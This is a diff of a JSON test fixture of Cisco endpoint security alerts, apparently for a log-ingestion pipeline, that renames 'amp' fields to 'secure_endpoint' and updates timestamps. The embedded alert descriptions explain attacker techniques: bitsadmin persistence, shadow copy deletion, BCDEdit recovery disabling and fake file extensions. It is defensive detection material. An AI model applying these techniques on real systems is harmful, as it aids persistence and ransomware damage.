                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -703,7 +703,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -778,7 +778,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783736424Z",
+                "ingested": "2021-09-27T00:40:55.631377929Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -789,7 +789,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -864,7 +864,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783738503Z",
+                "ingested": "2021-09-27T00:40:55.631379877Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.\",\"short_description\":\"W32.WScriptLaunchedZippedJS.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:05:50.000Z",
@@ -875,7 +875,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -950,7 +950,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783740861Z",
+                "ingested": "2021-09-27T00:40:55.631381940Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576726048000300,\"timestamp\":1610618696,\"timestamp_nanoseconds\":48000000,\"date\":\"2021-01-14T10:04:56+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618696,\"start_date\":\"2021-01-14T10:04:56+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"/C:/windows/system32/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:56.000Z",
@@ -961,7 +961,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1036,7 +1036,7 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-13T18:06:29.783742934Z",
+                "ingested": "2021-09-27T00:40:55.631383894Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1494576727672000300,\"timestamp\":1610618689,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-14T10:04:49+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610618689,\"start_date\":\"2021-01-14T10:04:49+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.\",\"short_description\":\"W32.BCDEditDisableRecovery.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:04:49.000Z",
@@ -1047,7 +1047,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1122,7 +1122,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783745003Z",
+                "ingested": "2021-09-27T00:40:55.631385847Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458617561791000300,\"timestamp\":1610618620,\"timestamp_nanoseconds\":791000000,\"date\":\"2021-01-14T10:03:40+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618620,\"start_date\":\"2021-01-14T10:03:40+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.\",\"short_description\":\"W32.FakeExtensionExec.RET\"},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"/c:/users/rsteadman/downloads/report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T10:03:40.000Z",
@@ -1134,7 +1134,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1203,13 +1203,13 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-13T18:06:29.783747078Z",
+                "ingested": "2021-09-27T00:40:55.631387803Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1275,13 +1275,13 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-13T18:06:29.783749146Z",
+                "ingested": "2021-09-27T00:40:55.631389732Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1347,13 +1347,13 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-13T18:06:29.783751302Z",
+                "ingested": "2021-09-27T00:40:55.631391769Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1419,13 +1419,13 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-13T18:06:29.783753383Z",
+                "ingested": "2021-09-27T00:40:55.631393728Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1491,13 +1491,13 @@
             "event": {
                 "severity": 2,
                 "action": "Quarantine Failure",
-                "ingested": "2021-09-13T18:06:29.783755459Z",
+                "ingested": "2021-09-27T00:40:55.631395647Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587034675643000,\"timestamp\":1610618511,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T10:01:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6880587034675642558\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225530,\"description\":\"Object path not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"identity\":{\"sha256\":\"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e\"}}}}",
                 "id": "6880587034675643000",
                 "kind": "alert"
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1583,7 +1583,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783757523Z",
+                "ingested": "2021-09-27T00:40:55.631397566Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880587030380676000,\"timestamp\":1610618510,\"timestamp_nanoseconds\":737000000,\"date\":\"2021-01-14T10:01:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Generic.Malware.WX.9E93D282\",\"detection_id\":\"6880587021790740668\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Unknown\",\"file_name\":\"p3fci4nu.dll\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\Temp\\\\p3fci4nu\\\\p3fci4nu.dll\",\"identity\":{\"sha256\":\"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48\"},\"parent\":{\"process_id\":6708,\"disposition\":\"Clean\",\"file_name\":\"csc.exe\",\"identity\":{\"sha256\":\"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57\",\"sha1\":\"93cf877f5627e55ec076a656e935042fac39950e\",\"md5\":\"23ee3d381cfe3b9f6229483e2ce2f9e1\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -1593,7 +1593,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "detection": "Generic.Malware.WX.9E93D282",
                     "computer": {
                         "active": true,
@@ -1666,7 +1666,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-13T18:06:29.783759589Z",
+                "ingested": "2021-09-27T00:40:55.631399480Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":460392585524661250,\"timestamp\":1610618215,\"timestamp_nanoseconds\":615000000,\"date\":\"2021-01-14T09:56:55+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618215,\"start_date\":\"2021-01-14T09:56:55+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The psexec utility was executed as admin.\",\"short_description\":\"W32.PsexecAsAdmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PsExec.exe\",\"file_path\":\"file:///C%3A/share%24/PsExec.exe\",\"identity\":{\"sha256\":\"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"}}}}}",
                 "kind": "alert",
                 "start": "2021-01-14T09:56:55.000Z",
@@ -1677,7 +1677,7 @@
                 ]
             },
             "cisco": {
-                "amp": {
+                "secure_endpoint": {
                     "computer": {
                         "active": true,
                         "network_addresses": [
@@ -1755,7 +1755,7 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-13T18:06:29.783761660Z",
+                "ingested": "2021-09-27T00:40:55.631401430Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508191586038317000,\"timestamp\":1610611000,\"timestamp_nanoseconds\":758406329,\"date\":\"2021-01-14T07:56:40+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}",
                 "kind": "alert",
                 "action": "File Fetch Completed",
@@ -1766,7 +1766,7 @@
